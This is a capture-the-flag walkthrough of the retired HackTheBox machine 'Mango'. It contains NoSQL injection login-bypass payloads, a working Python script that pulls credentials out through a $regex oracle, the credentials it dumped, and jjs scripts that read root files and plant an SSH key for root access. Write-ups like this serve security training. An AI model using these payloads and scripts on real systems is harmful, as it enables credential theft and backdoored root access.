Mango [HackTheBox] HTB
Hello guys, Mango is getting retired today and I have decided to release a write-up on it. The box was rated medium and had the IP address 10.10.10.162. The name Mango was a great hint to anyone tackling the box: for the initial foothold you had to exploit a MongoDB-backed login that was vulnerable to NoSQL injection, dump user credentials from the database, and then use those credentials to SSH into the box. There are two rabbit holes in this box that wasted much of my time; I am going to go through both of them and show you how I got out. Without further ado, let's jump in.
As always we’ll begin off with an Nmap scan
We see there are three ports open: ssh, http and https. Port 443 (https) exposes the hostname of the box (staging-order.mango.htb) in its TLS certificate. I added the hostname to my hosts file (/etc/hosts)
and navigated to the site in Firefox on both port 80 and port 443.
Port 80 (http) hosts a simple website that requires credentials to log in,
while port 443 hosts a Google-like web crawler search page. This was my first rabbit hole: I spent a long time trying to dump credentials from the database through this search bar, without success.
So I focused on port 80, which had the login page. My first approach was to bypass the authentication mechanism, and that was straightforward with Burp Suite and a couple of NoSQL injection payloads.
By renaming the form fields to username[$ne] and password[$ne] (PHP turns the bracket syntax into an array, so the filter MongoDB receives becomes {"username": {"$ne": "..."}, "password": {"$ne": "..."}}, which matches any user record) we get a 302 Found that redirects us to the homepage of the website. This was the second rabbit hole.
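To make the bypass concrete, here is an added Python model (not code from the box or from this write-up) of the two pieces that interact on the target: PHP's bracket syntax for request parameters and MongoDB's operator matching. Only the $ne and $regex operators are modelled, the user collection is constructed sample data with placeholder passwords, and `login_hardened` is the fix a practitioner would want next to the bug: refuse anything that is not a plain string before it reaches the query.

```python
import re
from urllib.parse import parse_qsl

# Constructed sample collection standing in for the box's users collection.
# The passwords are placeholders, not the real Mango credentials.
USERS = [
    {"username": "admin", "password": "p@ss1"},
    {"username": "mango", "password": "m4ngoPw"},
]


def php_parse(body):
    """Mimic the subset of PHP's $_POST parsing we need: `a[b]=c` becomes {"a": {"b": "c"}}."""
    parsed = {}
    for key, value in parse_qsl(body, keep_blank_values=True):
        m = re.fullmatch(r"([^\[]+)\[([^\]]*)\]", key)
        if m:
            parsed.setdefault(m.group(1), {})[m.group(2)] = value
        else:
            parsed[key] = value
    return parsed


def mongo_match(field_value, condition):
    """Tiny model of MongoDB field matching: plain equality, $ne and $regex only."""
    if not isinstance(condition, dict):
        return field_value == condition
    for op, arg in condition.items():
        if op == "$ne":
            if field_value == arg:
                return False
        elif op == "$regex":
            if field_value is None or re.search(arg, field_value) is None:
                return False
        else:
            raise ValueError("operator %s not modelled" % op)
    return True


def find_one(query):
    """Equivalent of collection.findOne(query) over the sample data."""
    for doc in USERS:
        if all(mongo_match(doc.get(field), cond) for field, cond in query.items()):
            return doc
    return None


def login_vulnerable(body):
    """Hands the parsed parameters straight to the query, as the staging app does.
    Returns the matched username (the box answers such a match with a 302), else None."""
    p = php_parse(body)
    doc = find_one({"username": p.get("username"), "password": p.get("password")})
    return doc["username"] if doc else None


def login_hardened(body):
    """Accept only plain strings, so bracket syntax can never inject an operator."""
    p = php_parse(body)
    user, password = p.get("username"), p.get("password")
    if not isinstance(user, str) or not isinstance(password, str):
        return None
    doc = find_one({"username": user, "password": password})
    return doc["username"] if doc else None
```

`login_vulnerable("username[$ne]=x&password[$ne]=x")` returns the first record in the collection, which is exactly the 302 seen in Burp; `login_vulnerable("username=mango&password[$regex]=^m4.*")` shows why a yes/no redirect is enough to leak a password one prefix at a time, which is what the extraction script further down automates. The type check in `login_hardened` is the minimal fix; a real application would also store only password hashes rather than compare plaintext in the query.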
The page had nothing but the information shown above. After some thought I decided to look for a way to dump the user credentials, the way sqlmap dumps credentials from a SQL database.
I found the following script, modified it a little to my liking and ran it. It uses the same login form as a yes/no oracle: a password[$regex] (or username[$regex]) filter of the form ^<known prefix><next char>.* answers with a 302 only when the guessed prefix is right, so each field is recovered one character at a time.
Here is the Python script:
###########################################
import requests
import string

url = "http://staging-order.mango.htb/"
headers = {"Host": "staging-order.mango.htb"}
cookies = {"PHPSESSID": "jo7dctnivj75pdtnkrc2k910ji"}

# Alphabet for the character-by-character search. Punctuation and whitespace are
# backslash-escaped so they are matched literally inside the $regex pattern.
possible_chars = list(string.ascii_letters) + list(string.digits) + ["\\" + c for c in string.punctuation + string.whitespace]


def matched(params):
    """Send one login attempt; a 302 redirect means the injected filter matched a document."""
    r = requests.post(url, data=params, headers=headers, cookies=cookies, verify=False, allow_redirects=False)
    return r.status_code == 302


def get_password(username):
    """Recover the password of `username` one character at a time via password[$regex]."""
    print("Extracting password of " + username)
    params = {"username": username, "password[$regex]": "", "login": "login"}
    password = "^"
    while True:
        extended = False
        for c in possible_chars:
            params["password[$regex]"] = password + c + ".*"
            if matched(params):
                password += c
                extended = True
                break
        if not extended:
            # No character extends the prefix: the password is complete.
            found = password[1:].replace("\\", "")
            print("Found password " + found + " for username " + username)
            return found


def get_usernames():
    """Enumerate usernames: find each first character that matches, then extend it."""
    usernames = []
    params = {"username[$regex]": "", "password[$regex]": ".*", "login": "login"}
    for c in possible_chars:
        username = "^" + c
        params["username[$regex]"] = username + ".*"
        if not matched(params):
            continue
        print("Found username starting with " + c)
        while True:
            extended = False
            for c2 in possible_chars:
                params["username[$regex]"] = username + c2 + ".*"
                if matched(params):
                    username += c2
                    print(username)
                    extended = True
                    break
            if not extended:
                # No character extends the prefix: the username is complete.
                found = username[1:].replace("\\", "")
                print("Found username: " + found)
                usernames.append(found)
                break
    return usernames


for u in get_usernames():
    get_password(u)
############################################
After about 20 minutes it had dumped the credentials of two users:
- admin with password: t9KcS3>!0B#2
- mango with password: h3mXK8RhU~f{]f5H
I tried to SSH into the box with admin's credentials and it didn't work; then I tried with mango's credentials and voila, I had a shell on the box.
I then switched to the admin user with su, using the same admin password from the dump, and it worked.
Now it's time to escalate our privileges to root.
In the admin user's home directory there was a .jjshistory file that looked odd. Since I did not know what to do with that file, I ran linpeas.
linpeas flags jjs as a likely path to root privileges.
The jjs binary is setuid root and executable by the admin user, which makes it an escalation path.
GTFOBins lists ways to use jjs to read files and also to write files.
1ST METHOD: Getting the root flag using jjs
Below is the script I used to obtain the root flag (it comes from the GTFOBins entry for jjs):
###########################################
// Nashorn (jjs) exposes the JDK classes; because jjs runs setuid root here,
// the FileReader opens /root/root.txt with root's privileges.
var BufferedReader = Java.type("java.io.BufferedReader");
var FileReader = Java.type("java.io.FileReader");
var br = new BufferedReader(new FileReader("/root/root.txt"));
var line;
while ((line = br.readLine()) != null) { print(line); }
br.close();
exit();
###########################################
And voila, we have the root flag.
2ND METHOD: Writing our own generated SSH public key with jjs's file-write capability and using the matching private key to SSH into the box as root
First we generate our own SSH key pair (for example with ssh-keygen).
Then, with the jjs script below, write our public key into root's .ssh directory as authorized_keys:
############################################
// FileWriter(path) truncates: any existing authorized_keys is replaced by our key.
var FileWriter = Java.type("java.io.FileWriter");
var fw = new FileWriter("/root/.ssh/authorized_keys");
fw.write("###YOUR OWN SSH PUBLIC KEY###\n");
fw.close();
exit();
############################################
After writing the public key, give the private key proper permissions (chmod 600) and use it with ssh -i to log into the box as root.
And we are root. Now it is time to submit the flags and get the points.
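The key-upload step as an added Python helper (not from the write-up): it validates the public key line, escapes it for a Nashorn string literal so characters in the key comment cannot break the script, emits the jjs payload, and checks the private key's mode before you pass it to ssh -i. It deliberately goes one step beyond the snippet above by opening the file in append mode, so an existing authorized_keys keeps its entries. The public key shown is a constructed placeholder.

```python
import os
import re
import stat

# Constructed placeholder public key; replace with the one ssh-keygen wrote to id_ed25519.pub.
SAMPLE_PUBKEY = "ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIPlaceholderKeyNotReal user@attacker"

_OPENSSH_KEY = re.compile(r"(ssh-ed25519|ssh-rsa|ecdsa-sha2-nistp(?:256|384|521)) [A-Za-z0-9+/=]+( \S.*)?")


def is_openssh_pubkey(line):
    """True for a single-line OpenSSH public key (type, base64 blob, optional comment)."""
    return _OPENSSH_KEY.fullmatch(line.strip()) is not None


def java_string_literal(text):
    """Escape text for a double-quoted Java/Nashorn string: backslashes, quotes, newlines."""
    escaped = text.replace("\\", "\\\\").replace('"', '\\"').replace("\n", "\\n")
    return '"' + escaped + '"'


def jjs_authorized_keys_payload(pubkey_line, path="/root/.ssh/authorized_keys"):
    """Return a jjs script that appends pubkey_line (with its newline) to path.

    FileWriter(path, true) opens in append mode, so an existing authorized_keys
    keeps its entries instead of being truncated as a plain FileWriter(path) would.
    """
    key = pubkey_line.strip()
    if not is_openssh_pubkey(key):
        raise ValueError("not a single-line OpenSSH public key")
    key_literal = java_string_literal(key + "\n")
    path_literal = java_string_literal(path)
    return (
        'var FileWriter = Java.type("java.io.FileWriter");\n'
        "var fw = new FileWriter(" + path_literal + ", true);\n"
        "fw.write(" + key_literal + ");\n"
        "fw.close();\n"
        "exit();\n"
    )


def mode_is_private(mode):
    """ssh rejects a private key readable by group or others; require no g/o permission bits."""
    return stat.S_IMODE(mode) & 0o077 == 0


def private_key_mode_ok(path):
    """Check an on-disk private key (e.g. id_ed25519) before passing it with ssh -i."""
    return mode_is_private(os.stat(path).st_mode)


if __name__ == "__main__":
    print(jjs_authorized_keys_payload(SAMPLE_PUBKEY))
```

Save the printed script on the box and run it with the setuid jjs (for example `jjs payload.js`, or paste it at the jjs prompt), then from the attacking machine run `chmod 600 id_ed25519` and `ssh -i id_ed25519 root@10.10.10.162`.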
That was it for now, guys. Till next time, take care, and if you liked the walkthrough you can clap for me down below.